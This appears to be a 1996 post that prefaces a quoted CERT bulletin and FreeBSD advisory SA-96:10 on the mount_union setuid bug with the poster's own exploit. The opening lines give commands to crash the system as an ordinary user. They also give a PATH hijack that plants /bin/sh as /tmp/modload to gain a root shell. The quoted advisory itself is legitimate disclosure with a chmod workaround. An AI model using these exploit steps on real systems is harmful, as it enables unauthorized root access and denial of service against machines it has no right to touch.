Looks like FreeBSD can't find a patch for this bad boy: FreeBSD has a security hole... mount_union is dangerous if suid is set vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT probably FreeBSD 2.1 STABLE is not vulnerable to crash system (as a normal user) try this: mkdir a mkdir b mount_union ~/a ~/b mount_union -b ~/a ~/b to got euid try this: export PATH=/tmp:$PATH #if zsh, of course echo /bin/sh >/tmp/modload chmod +x /tmp/modload mount_union /dir1 /dir2 and You are root! > ============================================================================= > CERT(sm) Vendor-Initiated Bulletin VB-96.07 > May 21, 1996 > > Topic: system stability compromise via mount_union program > Source: The FreeBSD Project, Inc. > > To aid in the wide distribution of essential security information, the CERT > Coordination Center is forwarding the following information from the Free BSD > Project, Inc. The FreeBSD Project urges you to act on this information as soon > as possible. Their contact information is included in the forwarded text > below; please contact them if you have any questions or need further > information. > > ========================FORWARDED TEXT STARTS HERE============================ > ============================================================================= > FreeBSD-SA-96:10 Security Advisory > The FreeBSD Project, Inc. > > Topic: system stability compromise via mount_union program > > Category: core > Module: unionfs > Announced: 1996-05-17 > Affects: FreeBSD 2.0, 2.0.5, 2.1, 2.1-stable, and 2.2-current > Corrected: (workaround) 2.1-stable and 2.2-current as of 1996-05-17 > Source: 4.4BSD (lite) > FreeBSD only: no > > Patches: ftp://freebsd.org/pub/CERT/patches/SA-96:10/ > > ============================================================================= > > I. Background > > A bug was found in the union file system code which can allow > an unprivileged local user to compromise system stability. > This problem is present in all source code and binary > distributions of FreeBSD version 2.x released before 1996-05-18. > > All FreeBSD users are encouraged to use the workaround provided > until the FreeBSD Project distributes a full solution. > > > II. Problem Description > > The union filesystem code had problems with certain mount ordering > problems. By executing a certain sequence of mount_union commands, > an unprivileged local user may cause a system reload. > > NOTE: This is a different problem than the one discussed in > FreeBSD SA-96:09. The workaround for this vulnerability is > similar to the one discussed in 96:09, but the proper solution > for the unauthorized access problem in 96:09 does not address > this vulnerability. > > > III. Impact > > The problem could allow local users to compromise system stability. > > This vulnerability can only be exploited by users with a valid > account on the local system. > > > IV. Solution(s) > > The FreeBSD project is currently developing a solution to this > problem, however the proper solution will not be available until > a future FreeBSD release. We do not anticipate releasing patches > for previous versions of FreeBSD due to the extensive nature of this > fix. This security advisory will be updated as new information is > made available. > > V. Workaround > > This vulnerability can quickly and easily be limited by removing > the setuid permission bit from the mount_union program. This > workaround will work for all versions of FreeBSD affected by > this problem. > > As root, execute the command: > > % chmod u-s /sbin/mount_union > > then verify that the setuid permissions of the files have been > removed. The permissions array should read "-r-xr-xr-x" as > shown here: > > % ls -l /sbin/mount_union > -r-xr-xr-x 1 root bin 53248 Apr 26 04:40 /sbin/mount_union > > In addition to changing the permissions on the executable files, > if you have the source code installed, we suggest patching the > sources so that mount_union will not be installed with the > setuid bit set: > > *** /usr/src/sbin/mount_union/Makefile Sun Nov 20 14:47:52 1994 > --- /usr/src/sbin/mount_union/Makefile Fri May 17 10:36:09 1996 > *************** > *** 8,14 **** > CFLAGS+= -I${.CURDIR}/../../sys -I${MOUNT} > .PATH: ${MOUNT} > > - BINOWN= root > - BINMODE=4555 > - > .include > --- 8,11 ---- > > ============================================================================= > The FreeBSD Project, Inc. > > Web Site: http://www.freebsd.com/ > Confidential contacts: security-officer@freebsd.org > PGP Key: ftp://freebsd.org/pub/CERT/public_key.asc > Security notifications: security-notifications@freebsd.org > Security public discussion: security@freebsd.org > > Notice: Any patches in this document may not apply cleanly due to > modifications caused by digital signature or mailer software. > Please reference the URL listed at the top of this document > for original copies of all patches if necessary. > ============================================================================= > > =========================FORWARDED TEXT ENDS HERE============================= > > If you believe that your system has been compromised, contact the CERT > Coordination Center or your representative in the Forum of Incident Response > and Security Teams (FIRST). > > We strongly urge you to encrypt any sensitive information you send by email. > The CERT Coordination Center can support a shared DES key and PGP. Contact the > CERT staff for more information. > > Location of CERT PGP key > ftp://info.cert.org/pub/CERT_PGP.key > > > CERT Contact Information > - ------------------------ > Email cert@cert.org > > Phone +1 412-268-7090 (24-hour hotline) > CERT personnel answer 8:30-5:00 p.m. EST > (GMT-5)/EDT(GMT-4), and are on call for > emergencies during other hours. > > Fax +1 412-268-6989 > > Postal address > CERT Coordination Center > Software Engineering Institute > Carnegie Mellon University > Pittsburgh PA 15213-3890 > USA > > CERT publications, information about FIRST representatives, and other > security-related information are available from > http://www.cert.org/ > ftp://info.cert.org/pub/ > > CERT advisories and bulletins are also posted on the USENET newsgroup > comp.security.announce > > To be added to our mailing list for CERT advisories and bulletins, send your > email address to > cert-advisory-request@cert.org > > > CERT is a service mark of Carnegie Mellon University. > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 >